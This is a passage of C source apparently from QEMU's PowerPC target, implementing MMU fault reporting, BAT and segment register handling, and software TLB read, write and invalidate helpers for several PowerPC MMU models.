implemented\n"); break; case POWERPC_MMU_BOOKE206: booke206_update_mas_tlb_miss(env, address, rw, mmu_idx); /* fall through */ case POWERPC_MMU_BOOKE: cs->exception_index = POWERPC_EXCP_DTLB; env->error_code = 0; env->spr[SPR_BOOKE_DEAR] = address; env->spr[SPR_BOOKE_ESR] = mmubooke206_esr(mmu_idx, rw); return -1; case POWERPC_MMU_REAL: cpu_abort(cs, "PowerPC in real mode should never raise " "any MMU exceptions\n"); return -1; default: cpu_abort(cs, "Unknown or invalid MMU model\n"); return -1; } break; case -2: /* Access rights violation */ cs->exception_index = POWERPC_EXCP_DSI; env->error_code = 0; if (env->mmu_model == POWERPC_MMU_SOFT_4xx || env->mmu_model == POWERPC_MMU_SOFT_4xx_Z) { env->spr[SPR_40x_DEAR] = address; if (rw) { env->spr[SPR_40x_ESR] |= 0x00800000; } } else if ((env->mmu_model == POWERPC_MMU_BOOKE) || (env->mmu_model == POWERPC_MMU_BOOKE206)) { env->spr[SPR_BOOKE_DEAR] = address; env->spr[SPR_BOOKE_ESR] = mmubooke206_esr(mmu_idx, rw); } else { env->spr[SPR_DAR] = address; if (rw == 1) { env->spr[SPR_DSISR] = 0x0A000000; } else { env->spr[SPR_DSISR] = 0x08000000; } } break; case -4: /* Direct store exception */ switch (access_type) { case ACCESS_FLOAT: /* Floating point load/store */ cs->exception_index = POWERPC_EXCP_ALIGN; env->error_code = POWERPC_EXCP_ALIGN_FP; env->spr[SPR_DAR] = address; break; case ACCESS_RES: /* lwarx, ldarx or stwcx. */ cs->exception_index = POWERPC_EXCP_DSI; env->error_code = 0; env->spr[SPR_DAR] = address; if (rw == 1) { env->spr[SPR_DSISR] = 0x06000000; } else { env->spr[SPR_DSISR] = 0x04000000; } break; case ACCESS_EXT: /* eciwx or ecowx */ cs->exception_index = POWERPC_EXCP_DSI; env->error_code = 0; env->spr[SPR_DAR] = address; if (rw == 1) { env->spr[SPR_DSISR] = 0x06100000; } else { env->spr[SPR_DSISR] = 0x04100000; } break; default: printf("DSI: invalid exception (%d)\n", ret); cs->exception_index = POWERPC_EXCP_PROGRAM; env->error_code = POWERPC_EXCP_INVAL | POWERPC_EXCP_INVAL_INVAL; env->spr[SPR_DAR] = address; break; } break; } } ret = 1; } return ret; } /*****************************************************************************/ /* BATs management */ #if !defined(FLUSH_ALL_TLBS) static inline void do_invalidate_BAT(CPUPPCState *env, target_ulong BATu, target_ulong mask) { CPUState *cs = env_cpu(env); target_ulong base, end, page; base = BATu & ~0x0001FFFF; end = base + mask + 0x00020000; if (((end - base) >> TARGET_PAGE_BITS) > 1024) { /* Flushing 1024 4K pages is slower than a complete flush */ LOG_BATS("Flush all BATs\n"); tlb_flush(CPU(cs)); LOG_BATS("Flush done\n"); return; } LOG_BATS("Flush BAT from " TARGET_FMT_lx " to " TARGET_FMT_lx " (" TARGET_FMT_lx ")\n", base, end, mask); for (page = base; page != end; page += TARGET_PAGE_SIZE) { tlb_flush_page(cs, page); } LOG_BATS("Flush done\n"); } #endif static inline void dump_store_bat(CPUPPCState *env, char ID, int ul, int nr, target_ulong value) { LOG_BATS("Set %cBAT%d%c to " TARGET_FMT_lx " (" TARGET_FMT_lx ")\n", ID, nr, ul == 0 ? 'u' : 'l', value, env->nip); } void helper_store_ibatu(CPUPPCState *env, uint32_t nr, target_ulong value) { target_ulong mask; #if defined(FLUSH_ALL_TLBS) PowerPCCPU *cpu = env_archcpu(env); #endif dump_store_bat(env, 'I', 0, nr, value); if (env->IBAT[0][nr] != value) { mask = (value << 15) & 0x0FFE0000UL; #if !defined(FLUSH_ALL_TLBS) do_invalidate_BAT(env, env->IBAT[0][nr], mask); #endif /* * When storing valid upper BAT, mask BEPI and BRPN and * invalidate all TLBs covered by this BAT */ mask = (value << 15) & 0x0FFE0000UL; env->IBAT[0][nr] = (value & 0x00001FFFUL) | (value & ~0x0001FFFFUL & ~mask); env->IBAT[1][nr] = (env->IBAT[1][nr] & 0x0000007B) | (env->IBAT[1][nr] & ~0x0001FFFF & ~mask); #if !defined(FLUSH_ALL_TLBS) do_invalidate_BAT(env, env->IBAT[0][nr], mask); #else tlb_flush(env_cpu(env)); #endif } } void helper_store_ibatl(CPUPPCState *env, uint32_t nr, target_ulong value) { dump_store_bat(env, 'I', 1, nr, value); env->IBAT[1][nr] = value; } void helper_store_dbatu(CPUPPCState *env, uint32_t nr, target_ulong value) { target_ulong mask; #if defined(FLUSH_ALL_TLBS) PowerPCCPU *cpu = env_archcpu(env); #endif dump_store_bat(env, 'D', 0, nr, value); if (env->DBAT[0][nr] != value) { /* * When storing valid upper BAT, mask BEPI and BRPN and * invalidate all TLBs covered by this BAT */ mask = (value << 15) & 0x0FFE0000UL; #if !defined(FLUSH_ALL_TLBS) do_invalidate_BAT(env, env->DBAT[0][nr], mask); #endif mask = (value << 15) & 0x0FFE0000UL; env->DBAT[0][nr] = (value & 0x00001FFFUL) | (value & ~0x0001FFFFUL & ~mask); env->DBAT[1][nr] = (env->DBAT[1][nr] & 0x0000007B) | (env->DBAT[1][nr] & ~0x0001FFFF & ~mask); #if !defined(FLUSH_ALL_TLBS) do_invalidate_BAT(env, env->DBAT[0][nr], mask); #else tlb_flush(env_cpu(env)); #endif } } void helper_store_dbatl(CPUPPCState *env, uint32_t nr, target_ulong value) { dump_store_bat(env, 'D', 1, nr, value); env->DBAT[1][nr] = value; } void helper_store_601_batu(CPUPPCState *env, uint32_t nr, target_ulong value) { target_ulong mask; #if defined(FLUSH_ALL_TLBS) PowerPCCPU *cpu = env_archcpu(env); int do_inval; #endif dump_store_bat(env, 'I', 0, nr, value); if (env->IBAT[0][nr] != value) { #if defined(FLUSH_ALL_TLBS) do_inval = 0; #endif mask = (env->IBAT[1][nr] << 17) & 0x0FFE0000UL; if (env->IBAT[1][nr] & 0x40) { /* Invalidate BAT only if it is valid */ #if !defined(FLUSH_ALL_TLBS) do_invalidate_BAT(env, env->IBAT[0][nr], mask); #else do_inval = 1; #endif } /* * When storing valid upper BAT, mask BEPI and BRPN and * invalidate all TLBs covered by this BAT */ env->IBAT[0][nr] = (value & 0x00001FFFUL) | (value & ~0x0001FFFFUL & ~mask); env->DBAT[0][nr] = env->IBAT[0][nr]; if (env->IBAT[1][nr] & 0x40) { #if !defined(FLUSH_ALL_TLBS) do_invalidate_BAT(env, env->IBAT[0][nr], mask); #else do_inval = 1; #endif } #if defined(FLUSH_ALL_TLBS) if (do_inval) { tlb_flush(env_cpu(env)); } #endif } } void helper_store_601_batl(CPUPPCState *env, uint32_t nr, target_ulong value) { #if !defined(FLUSH_ALL_TLBS) target_ulong mask; #else PowerPCCPU *cpu = env_archcpu(env); int do_inval; #endif dump_store_bat(env, 'I', 1, nr, value); if (env->IBAT[1][nr] != value) { #if defined(FLUSH_ALL_TLBS) do_inval = 0; #endif if (env->IBAT[1][nr] & 0x40) { #if !defined(FLUSH_ALL_TLBS) mask = (env->IBAT[1][nr] << 17) & 0x0FFE0000UL; do_invalidate_BAT(env, env->IBAT[0][nr], mask); #else do_inval = 1; #endif } if (value & 0x40) { #if !defined(FLUSH_ALL_TLBS) mask = (value << 17) & 0x0FFE0000UL; do_invalidate_BAT(env, env->IBAT[0][nr], mask); #else do_inval = 1; #endif } env->IBAT[1][nr] = value; env->DBAT[1][nr] = value; #if defined(FLUSH_ALL_TLBS) if (do_inval) { tlb_flush(env_cpu(env)); } #endif } } /*****************************************************************************/ /* TLB management */ void ppc_tlb_invalidate_all(CPUPPCState *env) { #if defined(TARGET_PPC64) if (env->mmu_model & POWERPC_MMU_64) { env->tlb_need_flush = 0; tlb_flush(env_cpu(env)); } else #endif /* defined(TARGET_PPC64) */ switch (env->mmu_model) { case POWERPC_MMU_SOFT_6xx: case POWERPC_MMU_SOFT_74xx: ppc6xx_tlb_invalidate_all(env); break; case POWERPC_MMU_SOFT_4xx: case POWERPC_MMU_SOFT_4xx_Z: ppc4xx_tlb_invalidate_all(env); break; case POWERPC_MMU_REAL: cpu_abort(env_cpu(env), "No TLB for PowerPC 4xx in real mode\n"); break; case POWERPC_MMU_MPC8xx: /* XXX: TODO */ cpu_abort(env_cpu(env), "MPC8xx MMU model is not implemented\n"); break; case POWERPC_MMU_BOOKE: tlb_flush(env_cpu(env)); break; case POWERPC_MMU_BOOKE206: booke206_flush_tlb(env, -1, 0); break; case POWERPC_MMU_32B: case POWERPC_MMU_601: env->tlb_need_flush = 0; tlb_flush(env_cpu(env)); break; default: /* XXX: TODO */ cpu_abort(env_cpu(env), "Unknown MMU model %x\n", env->mmu_model); break; } } void ppc_tlb_invalidate_one(CPUPPCState *env, target_ulong addr) { #if !defined(FLUSH_ALL_TLBS) addr &= TARGET_PAGE_MASK; #if defined(TARGET_PPC64) if (env->mmu_model & POWERPC_MMU_64) { /* tlbie invalidate TLBs for all segments */ /* * XXX: given the fact that there are too many segments to invalidate, * and we still don't have a tlb_flush_mask(env, n, mask) in QEMU, * we just invalidate all TLBs */ env->tlb_need_flush |= TLB_NEED_LOCAL_FLUSH; } else #endif /* defined(TARGET_PPC64) */ switch (env->mmu_model) { case POWERPC_MMU_SOFT_6xx: case POWERPC_MMU_SOFT_74xx: ppc6xx_tlb_invalidate_virt(env, addr, 0); if (env->id_tlbs == 1) { ppc6xx_tlb_invalidate_virt(env, addr, 1); } break; case POWERPC_MMU_32B: case POWERPC_MMU_601: /* * Actual CPUs invalidate entire congruence classes based on * the geometry of their TLBs and some OSes take that into * account, we just mark the TLB to be flushed later (context * synchronizing event or sync instruction on 32-bit). */ env->tlb_need_flush |= TLB_NEED_LOCAL_FLUSH; break; default: /* Should never reach here with other MMU models */ assert(0); } #else ppc_tlb_invalidate_all(env); #endif } /*****************************************************************************/ /* Special registers manipulation */ void ppc_store_sdr1(CPUPPCState *env, target_ulong value) { #if 0 PowerPCCPU *cpu = env_archcpu(env); qemu_log_mask(CPU_LOG_MMU, "%s: " TARGET_FMT_lx "\n", __func__, value); assert(!cpu->vhyp); #endif #if defined(TARGET_PPC64) if (env->mmu_model & POWERPC_MMU_64) { target_ulong sdr_mask = SDR_64_HTABORG | SDR_64_HTABSIZE; target_ulong htabsize = value & SDR_64_HTABSIZE; if (value & ~sdr_mask) { #if 0 error_report("Invalid bits 0x"TARGET_FMT_lx" set in SDR1", value & ~sdr_mask); #endif value &= sdr_mask; } if (htabsize > 28) { #if 0 error_report("Invalid HTABSIZE 0x" TARGET_FMT_lx" stored in SDR1", htabsize); #endif return; } } #endif /* defined(TARGET_PPC64) */ /* FIXME: Should check for valid HTABMASK values in 32-bit case */ env->spr[SPR_SDR1] = value; } #if defined(TARGET_PPC64) void ppc_store_ptcr(CPUPPCState *env, target_ulong value) { #if 0 PowerPCCPU *cpu = env_archcpu(env); #endif target_ulong ptcr_mask = PTCR_PATB | PTCR_PATS; target_ulong patbsize = value & PTCR_PATS; #if 0 qemu_log_mask(CPU_LOG_MMU, "%s: " TARGET_FMT_lx "\n", __func__, value); assert(!cpu->vhyp); #endif assert(env->mmu_model & POWERPC_MMU_3_00); if (value & ~ptcr_mask) { #if 0 error_report("Invalid bits 0x"TARGET_FMT_lx" set in PTCR", value & ~ptcr_mask); #endif value &= ptcr_mask; } if (patbsize > 24) { #if 0 error_report("Invalid Partition Table size 0x" TARGET_FMT_lx " stored in PTCR", patbsize); #endif return; } env->spr[SPR_PTCR] = value; } #endif /* defined(TARGET_PPC64) */ /* Segment registers load and store */ target_ulong helper_load_sr(CPUPPCState *env, target_ulong sr_num) { #if defined(TARGET_PPC64) if (env->mmu_model & POWERPC_MMU_64) { /* XXX */ return 0; } #endif return env->sr[sr_num]; } void helper_store_sr(CPUPPCState *env, target_ulong srnum, target_ulong value) { #if 0 qemu_log_mask(CPU_LOG_MMU, "%s: reg=%d " TARGET_FMT_lx " " TARGET_FMT_lx "\n", __func__, (int)srnum, value, env->sr[srnum]); #endif #if defined(TARGET_PPC64) if (env->mmu_model & POWERPC_MMU_64) { PowerPCCPU *cpu = env_archcpu(env); uint64_t esid, vsid; /* ESID = srnum */ esid = ((uint64_t)(srnum & 0xf) << 28) | SLB_ESID_V; /* VSID = VSID */ vsid = (value & 0xfffffff) << 12; /* flags = flags */ vsid |= ((value >> 27) & 0xf) << 8; ppc_store_slb(cpu, srnum, esid, vsid); } else #endif if (env->sr[srnum] != value) { env->sr[srnum] = value; /* * Invalidating 256MB of virtual memory in 4kB pages is way * longer than flusing the whole TLB. */ #if !defined(FLUSH_ALL_TLBS) && 0 { target_ulong page, end; /* Invalidate 256 MB of virtual memory */ page = (16 << 20) * srnum; end = page + (16 << 20); for (; page != end; page += TARGET_PAGE_SIZE) { tlb_flush_page(env_cpu(env), page); } } #else env->tlb_need_flush |= TLB_NEED_LOCAL_FLUSH; #endif } } /* TLB management */ void helper_tlbia(CPUPPCState *env) { ppc_tlb_invalidate_all(env); } void helper_tlbie(CPUPPCState *env, target_ulong addr) { ppc_tlb_invalidate_one(env, addr); } void helper_tlbiva(CPUPPCState *env, target_ulong addr) { /* tlbiva instruction only exists on BookE */ assert(env->mmu_model == POWERPC_MMU_BOOKE); /* XXX: TODO */ cpu_abort(env_cpu(env), "BookE MMU model is not implemented\n"); } /* Software driven TLBs management */ /* PowerPC 602/603 software TLB load instructions helpers */ static void do_6xx_tlb(CPUPPCState *env, target_ulong new_EPN, int is_code) { target_ulong RPN, CMP, EPN; int way; RPN = env->spr[SPR_RPA]; if (is_code) { CMP = env->spr[SPR_ICMP]; EPN = env->spr[SPR_IMISS]; } else { CMP = env->spr[SPR_DCMP]; EPN = env->spr[SPR_DMISS]; } way = (env->spr[SPR_SRR1] >> 17) & 1; (void)EPN; /* avoid a compiler warning */ #if 0 LOG_SWTLB("%s: EPN " TARGET_FMT_lx " " TARGET_FMT_lx " PTE0 " TARGET_FMT_lx " PTE1 " TARGET_FMT_lx " way %d\n", __func__, new_EPN, EPN, CMP, RPN, way); #endif /* Store this TLB */ ppc6xx_tlb_store(env, (uint32_t)(new_EPN & TARGET_PAGE_MASK), way, is_code, CMP, RPN); } void helper_6xx_tlbd(CPUPPCState *env, target_ulong EPN) { do_6xx_tlb(env, EPN, 0); } void helper_6xx_tlbi(CPUPPCState *env, target_ulong EPN) { do_6xx_tlb(env, EPN, 1); } /* PowerPC 74xx software TLB load instructions helpers */ static void do_74xx_tlb(CPUPPCState *env, target_ulong new_EPN, int is_code) { target_ulong RPN, CMP, EPN; int way; RPN = env->spr[SPR_PTELO]; CMP = env->spr[SPR_PTEHI]; EPN = env->spr[SPR_TLBMISS] & ~0x3; way = env->spr[SPR_TLBMISS] & 0x3; (void)EPN; /* avoid a compiler warning */ LOG_SWTLB("%s: EPN " TARGET_FMT_lx " " TARGET_FMT_lx " PTE0 " TARGET_FMT_lx " PTE1 " TARGET_FMT_lx " way %d\n", __func__, new_EPN, EPN, CMP, RPN, way); /* Store this TLB */ ppc6xx_tlb_store(env, (uint32_t)(new_EPN & TARGET_PAGE_MASK), way, is_code, CMP, RPN); } void helper_74xx_tlbd(CPUPPCState *env, target_ulong EPN) { do_74xx_tlb(env, EPN, 0); } void helper_74xx_tlbi(CPUPPCState *env, target_ulong EPN) { do_74xx_tlb(env, EPN, 1); } /*****************************************************************************/ /* PowerPC 601 specific instructions (POWER bridge) */ target_ulong helper_rac(CPUPPCState *env, target_ulong addr) { mmu_ctx_t ctx; int nb_BATs; target_ulong ret = 0; /* * We don't have to generate many instances of this instruction, * as rac is supervisor only. * * XXX: FIX THIS: Pretend we have no BAT */ nb_BATs = env->nb_BATs; env->nb_BATs = 0; if (get_physical_address(env, &ctx, addr, 0, ACCESS_INT) == 0) { ret = ctx.raddr; } env->nb_BATs = nb_BATs; return ret; } static inline target_ulong booke_tlb_to_page_size(int size) { return 1024 << (2 * size); } static inline int booke_page_size_to_tlb(target_ulong page_size) { int size; switch (page_size) { case 0x00000400UL: size = 0x0; break; case 0x00001000UL: size = 0x1; break; case 0x00004000UL: size = 0x2; break; case 0x00010000UL: size = 0x3; break; case 0x00040000UL: size = 0x4; break; case 0x00100000UL: size = 0x5; break; case 0x00400000UL: size = 0x6; break; case 0x01000000UL: size = 0x7; break; case 0x04000000UL: size = 0x8; break; case 0x10000000UL: size = 0x9; break; case 0x40000000UL: size = 0xA; break; #if defined(TARGET_PPC64) case 0x000100000000ULL: size = 0xB; break; case 0x000400000000ULL: size = 0xC; break; case 0x001000000000ULL: size = 0xD; break; case 0x004000000000ULL: size = 0xE; break; case 0x010000000000ULL: size = 0xF; break; #endif default: size = -1; break; } return size; } /* Helpers for 4xx TLB management */ #define PPC4XX_TLB_ENTRY_MASK 0x0000003f /* Mask for 64 TLB entries */ #define PPC4XX_TLBHI_V 0x00000040 #define PPC4XX_TLBHI_E 0x00000020 #define PPC4XX_TLBHI_SIZE_MIN 0 #define PPC4XX_TLBHI_SIZE_MAX 7 #define PPC4XX_TLBHI_SIZE_DEFAULT 1 #define PPC4XX_TLBHI_SIZE_SHIFT 7 #define PPC4XX_TLBHI_SIZE_MASK 0x00000007 #define PPC4XX_TLBLO_EX 0x00000200 #define PPC4XX_TLBLO_WR 0x00000100 #define PPC4XX_TLBLO_ATTR_MASK 0x000000FF #define PPC4XX_TLBLO_RPN_MASK 0xFFFFFC00 target_ulong helper_4xx_tlbre_hi(CPUPPCState *env, target_ulong entry) { ppcemb_tlb_t *tlb; target_ulong ret; int size; entry &= PPC4XX_TLB_ENTRY_MASK; tlb = &env->tlb.tlbe[entry]; ret = tlb->EPN; if (tlb->prot & PAGE_VALID) { ret |= PPC4XX_TLBHI_V; } size = booke_page_size_to_tlb(tlb->size); if (size < PPC4XX_TLBHI_SIZE_MIN || size > PPC4XX_TLBHI_SIZE_MAX) { size = PPC4XX_TLBHI_SIZE_DEFAULT; } ret |= size << PPC4XX_TLBHI_SIZE_SHIFT; env->spr[SPR_40x_PID] = tlb->PID; return ret; } target_ulong helper_4xx_tlbre_lo(CPUPPCState *env, target_ulong entry) { ppcemb_tlb_t *tlb; target_ulong ret; entry &= PPC4XX_TLB_ENTRY_MASK; tlb = &env->tlb.tlbe[entry]; ret = tlb->RPN; if (tlb->prot & PAGE_EXEC) { ret |= PPC4XX_TLBLO_EX; } if (tlb->prot & PAGE_WRITE) { ret |= PPC4XX_TLBLO_WR; } return ret; } void helper_4xx_tlbwe_hi(CPUPPCState *env, target_ulong entry, target_ulong val) { CPUState *cs = env_cpu(env); ppcemb_tlb_t *tlb; target_ulong page, end; LOG_SWTLB("%s entry %d val " TARGET_FMT_lx "\n", __func__, (int)entry, val); entry &= PPC4XX_TLB_ENTRY_MASK; tlb = &env->tlb.tlbe[entry]; /* Invalidate previous TLB (if it's valid) */ if (tlb->prot & PAGE_VALID) { end = tlb->EPN + tlb->size; LOG_SWTLB("%s: invalidate old TLB %d start " TARGET_FMT_lx " end " TARGET_FMT_lx "\n", __func__, (int)entry, tlb->EPN, end); for (page = tlb->EPN; page < end; page += TARGET_PAGE_SIZE) { tlb_flush_page(cs, page); } } tlb->size = booke_tlb_to_page_size((val >> PPC4XX_TLBHI_SIZE_SHIFT) & PPC4XX_TLBHI_SIZE_MASK); /* * We cannot handle TLB size < TARGET_PAGE_SIZE. * If this ever occurs, we should implement TARGET_PAGE_BITS_VARY */ if ((val & PPC4XX_TLBHI_V) && tlb->size < TARGET_PAGE_SIZE) { cpu_abort(cs, "TLB size " TARGET_FMT_lu " < %u " "are not supported (%d)\n" "Please implement TARGET_PAGE_BITS_VARY\n", tlb->size, TARGET_PAGE_SIZE, (int)((val >> 7) & 0x7)); } tlb->EPN = val & ~(tlb->size - 1); if (val & PPC4XX_TLBHI_V) { tlb->prot |= PAGE_VALID; if (val & PPC4XX_TLBHI_E) { /* XXX: TO BE FIXED */ cpu_abort(cs, "Little-endian TLB entries are not supported by now\n"); } } else { tlb->prot &= ~PAGE_VALID; } tlb->PID = env->spr[SPR_40x_PID]; /* PID */ LOG_SWTLB("%s: set up TLB %d RPN " TARGET_FMT_plx " EPN " TARGET_FMT_lx " size " TARGET_FMT_lx " prot %c%c%c%c PID %d\n", __func__, (int)entry, tlb->RPN, tlb->EPN, tlb->size, tlb->prot & PAGE_READ ? 'r' : '-', tlb->prot & PAGE_WRITE ? 'w' : '-', tlb->prot & PAGE_EXEC ? 'x' : '-', tlb->prot & PAGE_VALID ? 'v' : '-', (int)tlb->PID); /* Invalidate new TLB (if valid) */ if (tlb->prot & PAGE_VALID) { end = tlb->EPN + tlb->size; LOG_SWTLB("%s: invalidate TLB %d start " TARGET_FMT_lx " end " TARGET_FMT_lx "\n", __func__, (int)entry, tlb->EPN, end); for (page = tlb->EPN; page < end; page += TARGET_PAGE_SIZE) { tlb_flush_page(cs, page); } } } void helper_4xx_tlbwe_lo(CPUPPCState *env, target_ulong entry, target_ulong val) { ppcemb_tlb_t *tlb; LOG_SWTLB("%s entry %i val " TARGET_FMT_lx "\n", __func__, (int)entry, val); entry &= PPC4XX_TLB_ENTRY_MASK; tlb = &env->tlb.tlbe[entry]; tlb->attr = val & PPC4XX_TLBLO_ATTR_MASK; tlb->RPN = val & PPC4XX_TLBLO_RPN_MASK; tlb->prot = PAGE_READ; if (val & PPC4XX_TLBLO_EX) { tlb->prot |= PAGE_EXEC; } if (val & PPC4XX_TLBLO_WR) { tlb->prot |= PAGE_WRITE; } LOG_SWTLB("%s: set up TLB %d RPN " TARGET_FMT_plx " EPN " TARGET_FMT_lx " size " TARGET_FMT_lx " prot %c%c%c%c PID %d\n", __func__, (int)entry, tlb->RPN, tlb->EPN, tlb->size, tlb->prot & PAGE_READ ? 'r' : '-', tlb->prot & PAGE_WRITE ? 'w' : '-', tlb->prot & PAGE_EXEC ? 'x' : '-', tlb->prot & PAGE_VALID ? 'v' : '-', (int)tlb->PID); } target_ulong helper_4xx_tlbsx(CPUPPCState *env, target_ulong address) { return ppcemb_tlb_search(env, address, env->spr[SPR_40x_PID]); } /* PowerPC 440 TLB management */ void helper_440_tlbwe(CPUPPCState *env, uint32_t word, target_ulong entry, target_ulong value) { ppcemb_tlb_t *tlb; target_ulong EPN, RPN, size; int do_flush_tlbs; LOG_SWTLB("%s word %d entry %d value " TARGET_FMT_lx "\n", __func__, word, (int)entry, value); do_flush_tlbs = 0; entry &= 0x3F; tlb = &env->tlb.tlbe[entry]; switch (word) { default: /* Just here to please gcc */ case 0: EPN = value & 0xFFFFFC00; if ((tlb->prot & PAGE_VALID) && EPN != tlb->EPN) { do_flush_tlbs = 1; } tlb->EPN = EPN; size = booke_tlb_to_page_size((value >> 4) & 0xF); if ((tlb->prot & PAGE_VALID) && tlb->size < size) { do_flush_tlbs = 1; } tlb->size = size; tlb->attr &= ~0x1; tlb->attr |= (value >> 8) & 1; if (value & 0x200) { tlb->prot |= PAGE_VALID; } else { if (tlb->prot & PAGE_VALID) { tlb->prot &= ~PAGE_VALID; do_flush_tlbs = 1; } } tlb->PID = env->spr[SPR_440_MMUCR] & 0x000000FF; if (do_flush_tlbs) { tlb_flush(env_cpu(env)); } break; case 1: RPN = value & 0xFFFFFC0F; if ((tlb->prot & PAGE_VALID) && tlb->RPN != RPN) { tlb_flush(env_cpu(env)); } tlb->RPN = RPN; break; case 2: tlb->attr = (tlb->attr & 0x1) | (value & 0x0000FF00); tlb->prot = tlb->prot & PAGE_VALID; if (value & 0x1) { tlb->prot |= PAGE_READ << 4; } if (value & 0x2) { tlb->prot |= PAGE_WRITE << 4; } if (value & 0x4) { tlb->prot |= PAGE_EXEC << 4; } if (value & 0x8) { tlb->prot |= PAGE_READ; } if (value & 0x10) { tlb->prot |= PAGE_WRITE; } if (value & 0x20) { tlb->prot |= PAGE_EXEC; } break; } } target_ulong helper_440_tlbre(CPUPPCState *env, uint32_t word, target_ulong entry) { ppcemb_tlb_t *tlb; target_ulong ret; int size; entry &= 0x3F; tlb = &env->tlb.tlbe[entry]; switch (word) { default: /* Just here to please gcc */ case 0: ret = tlb->EPN; size = booke_page_size_to_tlb(tlb->size); if (size < 0 || size > 0xF) { size = 1; } ret |= size << 4; if (tlb->attr & 0x1) { ret |= 0x100; } if (tlb->prot & PAGE_VALID) { ret |= 0x200; } env->spr[SPR_440_MMUCR] &= ~0x000000FF; env->spr[SPR_440_MMUCR] |= tlb->PID; break; case 1: ret = tlb->RPN; break; case 2: ret = tlb->attr & ~0x1; if (tlb->prot & (PAGE_READ << 4)) { ret |= 0x1; } if (tlb->prot & (PAGE_WRITE << 4)) { ret |= 0x2; } if (tlb->prot & (PAGE_EXEC << 4)) { ret |= 0x4; } if (tlb->prot & PAGE_READ) { ret |= 0x8; } if (tlb->prot & PAGE_WRITE) { ret |= 0x10; } if (tlb->prot & PAGE_EXEC) { ret |= 0x20; } break; } return ret; } target_ulong helper_440_tlbsx(CPUPPCState *env, target_ulong address) { return ppcemb_tlb_search(env, address, env->spr[SPR_440_MMUCR] & 0xFF); } /* PowerPC BookE 2.06 TLB management */ static ppcmas_tlb_t *booke206_cur_tlb(CPUPPCState *env) { uint32_t tlbncfg = 0; int esel = (env->spr[SPR_BOOKE_MAS0] & MAS0_ESEL_MASK) >> MAS0_ESEL_SHIFT; int ea = (env->spr[SPR_BOOKE_MAS2] & MAS2_EPN_MASK); int tlb; tlb = (env->spr[SPR_BOOKE_MAS0] & MAS0_TLBSEL_MASK) >> MAS0_TLBSEL_SHIFT; tlbncfg = env->spr[SPR_BOOKE_TLB0CFG + tlb]; if ((tlbncfg & TLBnCFG_HES) && (env->spr[SPR_BOOKE_MAS0] & MAS0_HES)) { cpu_abort(env_cpu(env), "we don't support HES yet\n"); } return booke206_get_tlbm(env, tlb, ea, esel); } void helper_booke_setpid(CPUPPCState *env, uint32_t pidn, target_ulong pid) { env->spr[pidn] = pid; /* changing PIDs mean we're in a different address space now */ tlb_flush(env_cpu(env)); } void helper_booke_set_eplc(CPUPPCState *env, target_ulong val) { env->spr[SPR_BOOKE_EPLC] = val & EPID_MASK; tlb_flush_by_mmuidx(env_cpu(env), 1 << PPC_TLB_EPID_LOAD); } void helper_booke_set_epsc(CPUPPCState *env, target_ulong val) { env->spr[SPR_BOOKE_EPSC] = val & EPID_MASK; tlb_flush_by_mmuidx(env_cpu(env), 1 << PPC_TLB_EPID_STORE); } static inline void flush_page(CPUPPCState *env, ppcmas_tlb_t *tlb) { if (booke206_tlb_to_page_size(env, tlb) == TARGET_PAGE_SIZE) { tlb_flush_page(env_cpu(env), tlb->mas2 & MAS2_EPN_MASK); } else { tlb_flush(env_cpu(env)); } } void helper_booke206_tlbwe(CPUPPCState *env) { uint32_t tlbncfg, tlbn; ppcmas_tlb_t *tlb; uint32_t size_tlb, size_ps; target_ulong mask; switch (env->spr[SPR_BOOKE_MAS0] & MAS0_WQ_MASK) { case MAS0_WQ_ALWAYS: /* good to go, write that entry */ break; case MAS0_WQ_COND: /* XXX check if reserved */ if (0) { return; } break; case MAS0_WQ_CLR_RSRV: /* XXX clear entry */ return; default: /* no idea what to do */ return; } if (((env->spr[SPR_BOOKE_MAS0] & MAS0_ATSEL) == MAS0_ATSEL_LRAT) && !msr_gs) { /* XXX we don't support direct LRAT setting yet */ fprintf(stderr, "cpu: don't support LRAT setting yet\n"); return; } tlbn = (env->spr[SPR_BOOKE_MAS0] & MAS0_TLBSEL_MASK) >> MAS0_TLBSEL_SHIFT; tlbncfg = env->spr[SPR_BOOKE_TLB0CFG + tlbn]; tlb = booke206_cur_tlb(env); if (!tlb) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL | POWERPC_EXCP_INVAL_INVAL, GETPC()); } /* check that we support the targeted size */ size_tlb = (env->spr[SPR_BOOKE_MAS1] & MAS1_TSIZE_MASK) >> MAS1_TSIZE_SHIFT; size_ps = booke206_tlbnps(env, tlbn); if ((env->spr[SPR_BOOKE_MAS1] & MAS1_VALID) && (tlbncfg & TLBnCFG_AVAIL) && !(size_ps & (1 << size_tlb))) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL | POWERPC_EXCP_INVAL_INVAL, GETPC()); } if (msr_gs) { cpu_abort(env_cpu(env), "missing HV implementation\n"); } if (tlb->mas1 & MAS1_VALID) { /* * Invalidate the page in QEMU TLB if it was a valid entry. * * In "PowerPC e500 Core Family Reference Manual, Rev. 1", * Section "12.4.2 TLB Write Entry (tlbwe) Instruction": * (https://www.nxp.com/docs/en/reference-manual/E500CORERM.pdf) * * "Note that when an L2 TLB entry is written, it may be displacing an * already valid entry in the same L2 TLB location (a victim). If a * valid L1 TLB entry corresponds to the L2 MMU victim entry, that L1 * TLB entry is automatically invalidated." */ flush_page(env, tlb); } tlb->mas7_3 = ((uint64_t)env->spr[SPR_BOOKE_MAS7] << 32) | env->spr[SPR_BOOKE_MAS3]; tlb->mas1 = env->spr[SPR_BOOKE_MAS1]; if ((env->spr[SPR_MMUCFG] & MMUCFG_MAVN) == MMUCFG_MAVN_V2) { /* For TLB which has a fixed size TSIZE is ignored with MAV2 */ booke206_fixed_size_tlbn(env, tlbn, tlb); } else { if (!(tlbncfg & TLBnCFG_AVAIL)) { /* force !AVAIL TLB entries to correct page size */ tlb->mas1 &= ~MAS1_TSIZE_MASK; /* XXX can be configured in MMUCSR0 */ tlb->mas1 |= (tlbncfg & TLBnCFG_MINSIZE) >> 12; } } /* Make a mask from TLB size to discard invalid bits in EPN field */ mask = ~(booke206_tlb_to_page_size(env, tlb) - 1); /* Add a mask for page attributes */ mask |= MAS2_ACM | MAS2_VLE | MAS2_W | MAS2_I | MAS2_M | MAS2_G | MAS2_E; if (!msr_cm) { /* * Executing a tlbwe instruction in 32-bit mode will set bits * 0:31 of the TLB EPN field to zero. */ mask &= 0xffffffff; } tlb->mas2 = env->spr[SPR_BOOKE_MAS2] & mask; if (!(tlbncfg & 